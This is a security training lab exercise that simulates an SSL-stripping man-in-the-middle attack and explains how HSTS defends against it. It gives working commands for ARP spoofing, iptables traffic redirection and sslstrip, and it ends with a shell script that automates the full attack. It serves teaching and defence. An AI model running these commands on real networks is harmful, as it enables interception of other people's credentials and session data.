Exercise 32: Simulating MITM Attacks with SSL Strip

Objective

Simulate a Man-in-the-Middle (MITM) attack using sslstrip to downgrade HTTPS traffic to HTTP, capture unencrypted data, and understand how HSTS mitigates such attacks.

Scenario

As a cybersecurity analyst, understanding how attackers intercept secure communications is critical. In this exercise, you will simulate a MITM attack using sslstrip to downgrade HTTPS traffic to HTTP. You will capture and analyze unencrypted data with Wireshark and explore how HSTS (HTTP Strict Transport Security) prevents such attacks.

⚠️ Important: This exercise must only be performed in a legal and controlled lab environment. Unauthorized MITM attacks are illegal and unethical.

Lab Instructions

Step 1: Set Up the Lab Environment

• Attacker Machine: Linux system with sslstrip, iptables, and Wireshark installed.
• Victim Machine: Device connected to the same network as the attacker.
• Router/Access Point: To route traffic between devices.

Step 2: Install Required Tools

a. Install sslstrip

sudo apt update
sudo apt install sslstrip -y

b. Install Wireshark

sudo apt install wireshark -y

Step 3: Enable IP Forwarding on the Attacker Machine

sudo sysctl -w net.ipv4.ip_forward=1

Step 4: Set Up iptables for Traffic Redirection

• Redirect HTTP (port 80) traffic to sslstrip:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Step 5: Launch ARP Spoofing

• Install arpspoof if not already installed:

sudo apt install dsniff -y

• Start ARP spoofing to redirect traffic between the victim and the router:

sudo arpspoof -i wlan0 -t <victim-ip> <gateway-ip>
sudo arpspoof -i wlan0 -t <gateway-ip> <victim-ip>

Step 6: Run sslstrip to Intercept Traffic

sudo sslstrip -l 8080

Step 7: Capture Traffic Using Wireshark

• Open Wireshark on the Attacker Machine.
• Start capturing traffic on the interface (wlan0 or eth0).
• Apply the filter to observe HTTP traffic:

http

• Monitor for intercepted credentials and other sensitive data.

Step 8: Analyze the Captured Data

• Review captured packets for:
  • Usernames and passwords sent over HTTP.
  • URLs accessed by the victim.
• Expected Result: SSL/TLS traffic downgraded to HTTP, exposing sensitive data.

Step 9: Discuss HSTS Mitigation

• HSTS (HTTP Strict Transport Security) forces browsers to use HTTPS.
• Websites with HSTS cannot be downgraded to HTTP, preventing sslstrip attacks.
• Example HTTP response header:

Strict-Transport-Security: max-age=31536000; includeSubDomains

Step 10: Mitigation Strategies

1. Implement HSTS: Ensure websites use HSTS headers.
2. Use HTTPS Everywhere: Browser extensions enforce HTTPS connections.
3. Monitor Network Traffic: Deploy IDS/IPS to detect ARP spoofing.
4. Public Key Pinning: Prevent certificate forgery.

Solution & Explanation

How sslstrip Works

• sslstrip intercepts HTTP requests and prevents redirection to HTTPS.
• The attacker relays traffic between the victim and server while stripping SSL encryption.

Impact of the Attack

• Credentials Exposure: Login information transmitted in plaintext.
• Data Theft: Sensitive data like session tokens can be intercepted.
• User Deception: Victims believe they’re on secure HTTPS sites.

Role of HSTS in Mitigation

• Enforces HTTPS: Browsers refuse HTTP connections to HSTS-enabled sites.
• Prevents Downgrade Attacks: sslstrip becomes ineffective.
• Example: Websites like Google and Facebook use HSTS.

Testing & Verification

• Confirm that SSL/TLS traffic is downgraded to HTTP without HSTS.
• Access an HSTS-enabled site and verify the attack fails.
• Monitor Wireshark for unencrypted data.

Verify HSTS Header

curl -I https://example.com | grep -i strict-transport-security

Security Best Practices

1. Enable HSTS: Protect websites from SSL stripping.
2. Deploy Network Monitoring: Detect ARP spoofing and MITM attacks.
3. Use Strong Encryption: Enforce TLS 1.2/1.3 and disable insecure protocols.
4. Educate Users: Raise awareness about HTTPS indicators.

Additional Script (Optional)

Automate sslstrip and ARP spoofing setup:

#!/bin/bash
# SSLStrip MITM Attack Automation Script

# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Redirect HTTP traffic to sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start ARP spoofing
xterm -e "sudo arpspoof -i wlan0 -t <victim-ip> <gateway-ip>" &
xterm -e "sudo arpspoof -i wlan0 -t <gateway-ip> <victim-ip>" &

# Start sslstrip
sudo sslstrip -l 8080

Run the script:

chmod +x sslstrip_attack.sh
sudo ./sslstrip_attack.sh

Conclusion

In this exercise, you simulated a MITM attack using sslstrip to downgrade HTTPS traffic to HTTP. You captured and analyzed unencrypted data and explored how HSTS mitigates such attacks. Understanding these vulnerabilities is crucial for implementing secure web practices and protecting sensitive information.